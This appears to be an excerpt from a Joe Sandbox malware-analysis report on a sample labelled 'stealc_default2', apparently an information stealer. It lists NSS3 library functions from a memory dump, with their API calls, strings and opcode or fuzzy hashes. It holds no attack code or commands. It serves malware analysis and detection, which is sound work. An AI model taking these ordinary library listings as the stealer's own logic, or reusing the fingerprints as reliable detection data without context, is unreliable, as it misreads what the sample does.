Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: c576707eea995c385e2f7f77470459bd9b5d4701988277ea38e990c18b4f5577
Instruction ID: 019504f6db06b4570124ee1e7b5f1c8f8ea0956a42db37b2278bb8c7888510d0
Opcode Fuzzy Hash: c576707eea995c385e2f7f77470459bd9b5d4701988277ea38e990c18b4f5577
Instruction Fuzzy Hash: D811E6E5F0311112EB11EA793C40AAE386C5B5710CF680934E819E2F80FB25C52887F7

Function 6C9A1C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C9A13BC,?,?,?,6C9A1193), ref: 6C9A1C6B
PR_NewLock.NSS3(?,6C9A1193), ref: 6C9A1C7E

Part of subcall function 6C9598D0: calloc.MOZGLUE(00000001,00000084,6C880936,00000001,?,6C88102C), ref: 6C9598E5

PR_NewCondVar.NSS3(00000000,?,6C9A1193), ref: 6C9A1C91

Part of subcall function 6C87BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C8821BC), ref: 6C87BB8C

PR_NewCondVar.NSS3(00000000,?,?,6C9A1193), ref: 6C9A1CA7

Part of subcall function 6C87BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C87BBEB
Part of subcall function 6C87BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C87BBFB
Part of subcall function 6C87BB80: GetLastError.KERNEL32 ref: 6C87BC03
Part of subcall function 6C87BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C87BC19
Part of subcall function 6C87BB80: free.MOZGLUE(00000000), ref: 6C87BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C9A1193), ref: 6C9A1CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C9A1193), ref: 6C9A1CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C9A1193), ref: 6C9A1CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C9A1193), ref: 6C9A1D1A

Part of subcall function 6C959BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C881A48), ref: 6C959BB3
Part of subcall function 6C959BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C881A48), ref: 6C959BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C9A1193), ref: 6C9A1D3D

Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6C9A1193), ref: 6C9A1D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C9A1193), ref: 6C9A1D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C9A1193), ref: 6C9A1D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C9A1193), ref: 6C9A1D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C9A1193), ref: 6C9A1D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C9A1193), ref: 6C9A1D93
PR_DestroyLock.NSS3(00000000,?,?,6C9A1193), ref: 6C9A1D9F
free.MOZGLUE(00000000,?,6C9A1193), ref: 6C9A1DA8

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: b70a89c45a14aba44da0cff9de10671bb8da7cd775d6a4e8e053e0cef06b8876
Instruction ID: 427d4974863fc6c2d0aeb3d360257731d2af7520106c5959ca340891465f9894
Opcode Fuzzy Hash: b70a89c45a14aba44da0cff9de10671bb8da7cd775d6a4e8e053e0cef06b8876
Instruction Fuzzy Hash: DE31DBF5D007119BEB209F69AC41A6B76E8AF1660DF140839D84A87F41F731E419CBA2

Function 6C8F5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C8F5EC0,00000000,?,?), ref: 6C8F5CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C8F5CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C8F5CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C8F5D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C8F5EC0,00000000,?,?), ref: 6C8F5D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C8F5D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8F5D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8F5D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C8F5D80

Strings

NSS_DEFAULT_DB_TYPE, xrefs: 6C8F5D1A
extern:, xrefs: 6C8F5CEA, 6C8F5D4B
sql:, xrefs: 6C8F5CD1, 6C8F5D36
dbm:, xrefs: 6C8F5D03, 6C8F5D60
multiaccess:, xrefs: 6C8F5CB8

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 16e17c84d07b0637f55d72e8c5ffeff8b8fe66009ee126a0f76a38cb84109ff1
Instruction ID: 8e51dc18b69e40823be813578af915f9fe92d47dc18964315e07e57fe8d21a74
Opcode Fuzzy Hash: 16e17c84d07b0637f55d72e8c5ffeff8b8fe66009ee126a0f76a38cb84109ff1
Instruction Fuzzy Hash: E2312EA07433015BE7702E249D5DB763758AF017CAF254C34EDB9E6681E771D502C271

Function 6C8F6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C9C1DE0,?), ref: 6C8F6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C8F6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C8F6D82
DER_GetInteger_Util.NSS3(?), ref: 6C8F6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8F6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C8F6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C8F6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C8F6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C8F6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C8F7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C8F7033
free.MOZGLUE(?), ref: 6C8F703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C8F7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C8F7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C8F70AF

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 4922bf47a0d503a79218411e44f4b6012222a95d7dbe9cab7697f0ebf04b2ae7
Instruction ID: 4947177443eed0f215cc07e74f691a2218e3a9ddb30b5b80b6beae49dc31f702
Opcode Fuzzy Hash: 4922bf47a0d503a79218411e44f4b6012222a95d7dbe9cab7697f0ebf04b2ae7
Instruction Fuzzy Hash: D1A108729182019BFB209F24DE41B5A32A4DB8139CF244F39E978CBB81E775D856C753

Function 6C8BAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BAF39
PR_Unlock.NSS3(?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BAF69
TlsGetValue.KERNEL32 ref: 6C8BB06B
EnterCriticalSection.KERNEL32(?), ref: 6C8BB083
PR_Unlock.NSS3(?), ref: 6C8BB0A4
TlsGetValue.KERNEL32 ref: 6C8BB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C8BB0D9
PR_Unlock.NSS3 ref: 6C8BB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8BB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8BB182

Part of subcall function 6C8EFAB0: free.MOZGLUE(?,-00000001,?,?,6C88F673,00000000,00000000), ref: 6C8EFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C8BB177

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BB1C2

Part of subcall function 6C8E1560: TlsGetValue.KERNEL32(00000000,?,6C8B0844,?), ref: 6C8E157A
Part of subcall function 6C8E1560: EnterCriticalSection.KERNEL32(?,?,?,6C8B0844,?), ref: 6C8E158F
Part of subcall function 6C8E1560: PR_Unlock.NSS3(?,?,?,?,6C8B0844,?), ref: 6C8E15B2

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: f4f81896a57ad4005b412059a1dfad5d946b118544671dcef16220d1d27693e7
Instruction ID: 027aa27efa2db18bb906b955cc80890b77415c3e60f33087226905b63ef20b41
Opcode Fuzzy Hash: f4f81896a57ad4005b412059a1dfad5d946b118544671dcef16220d1d27693e7
Instruction Fuzzy Hash: 1BA1B1B1D002059FEF109FA8DD81AFE7BB4AF19308F144924E809A6751E731E959CBA1

Function 6C90AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90ADB1

Part of subcall function 6C8EBE30: SECOID_FindOID_Util.NSS3(6C8A311B,00000000,?,6C8A311B,?), ref: 6C8EBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C90ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C90AE08

Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C90AE25
PL_FreeArenaPool.NSS3 ref: 6C90AE63
PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C90AE4D

Part of subcall function 6C814C70: TlsGetValue.KERNEL32(?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814C97
Part of subcall function 6C814C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CB0
Part of subcall function 6C814C70: PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90AE93
PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C90AECC
PL_FreeArenaPool.NSS3 ref: 6C90AEDE
PL_FinishArenaPool.NSS3 ref: 6C90AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90AEF5
PL_FinishArenaPool.NSS3 ref: 6C90AF16

Strings

security, xrefs: 6C90ADEE

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: d71f4041faa989ce09125e2c6e6e1d9e0dad6af0482359e8970ffb77699545bc
Instruction ID: 35d73fe70d954ad968555bd07987c2fe94deff9f1811fd73587be4d3c0419a65
Opcode Fuzzy Hash: d71f4041faa989ce09125e2c6e6e1d9e0dad6af0482359e8970ffb77699545bc
Instruction Fuzzy Hash: CA4118B1A04210A7E7209B289C45BAB33ADAF9231CF140939E96496F41FF35D619C7D3

Function 6C925CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C922BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C922A28,00000060,00000001), ref: 6C922BF0
Part of subcall function 6C922BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C922A28,00000060,00000001), ref: 6C922C07
Part of subcall function 6C922BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C922A28,00000060,00000001), ref: 6C922C1E
Part of subcall function 6C922BE0: free.MOZGLUE(?,00000000,00000000,?,6C922A28,00000060,00000001), ref: 6C922C4A

free.MOZGLUE(?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D0F
free.MOZGLUE(?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D4E
free.MOZGLUE(?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D62
free.MOZGLUE(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D85
free.MOZGLUE(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D99
free.MOZGLUE(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C925E3E
free.MOZGLUE(?,?,?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C925E47
free.MOZGLUE(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C925E78
free.MOZGLUE(?,?,?,?,?,?,?,6C92AAD4), ref: 6C925EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C92AAD4), ref: 6C925EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C925F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C925F4B

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 04e71d32654363a89191092998f3dc31704dee9b5d71bb9b74b1227439906533
Instruction ID: 682be3e4acb86c8764ebae831b249f4d02f89c4654fb9458bb1d30f969130a06
Opcode Fuzzy Hash: 04e71d32654363a89191092998f3dc31704dee9b5d71bb9b74b1227439906533
Instruction Fuzzy Hash: 7071E2B4A04B009FD710DF24D884A92B7F9FF99308F148528E8AE87B15EB35F915CB91

Function 6C8A8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C8A8E22
EnterCriticalSection.KERNEL32(?), ref: 6C8A8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C8A8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C8A8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8A8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C8A8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C8A8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8F00
free.MOZGLUE(?), ref: 6C8A8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C8A8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8F5B
PR_Unlock.NSS3(?), ref: 6C8A8F72
PR_Unlock.NSS3(?), ref: 6C8A8F82

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 757f2926a0dbb5fe1eb16ed226918e486fe784eb530262e567c563d91df9d71e
Instruction ID: a28dfdaba8af10f0a3d775988741362b19db2ce7a0d8b16e64fe523fb775a12b
Opcode Fuzzy Hash: 757f2926a0dbb5fe1eb16ed226918e486fe784eb530262e567c563d91df9d71e
Instruction Fuzzy Hash: 355159B2D002159FDB209FA8CD8496EB7B9EF65358F144929EC089B700E731ED1687F1

Function 6C81DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C81DD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C81DD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C81DE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C81DEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C81DECD

Strings

%s at line %d of [%.10s], xrefs: 6C81DF7C, 6C81DFEC
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C81DF6D, 6C81DFCC, 6C81DFDD
database corruption, xrefs: 6C81DF77, 6C81DFE7

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 0e6962105cdf884ea61305d42cfef93bb9bad2697d2640ea4d22e9920f3dda49
Instruction ID: 6394cbaa1d187d980a1f30b1cbedb501af002d50e915bf284e019ec2c02412f0
Opcode Fuzzy Hash: 0e6962105cdf884ea61305d42cfef93bb9bad2697d2640ea4d22e9920f3dda49
Instruction Fuzzy Hash: 13A1E5716082169FC722CF29C580B6AB7F5AF95308F158D2EF8898BF41D730E945CB91

Function 6C8DEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C8DEE0B

Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8DEEE1

Part of subcall function 6C8D1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C8D1D7E
Part of subcall function 6C8D1D50: EnterCriticalSection.KERNEL32(?), ref: 6C8D1D8E
Part of subcall function 6C8D1D50: PR_Unlock.NSS3(?), ref: 6C8D1DD3

TlsGetValue.KERNEL32 ref: 6C8DEE51
EnterCriticalSection.KERNEL32(?), ref: 6C8DEE65
PR_Unlock.NSS3(?), ref: 6C8DEEA2
free.MOZGLUE(?), ref: 6C8DEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C8DEED0
PR_Unlock.NSS3(?), ref: 6C8DEF48
free.MOZGLUE(?), ref: 6C8DEF68
PR_SetError.NSS3(00000000,00000000), ref: 6C8DEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C8DEFA4
free.MOZGLUE(?), ref: 6C8DEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C8DF055
free.MOZGLUE(?), ref: 6C8DF060

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
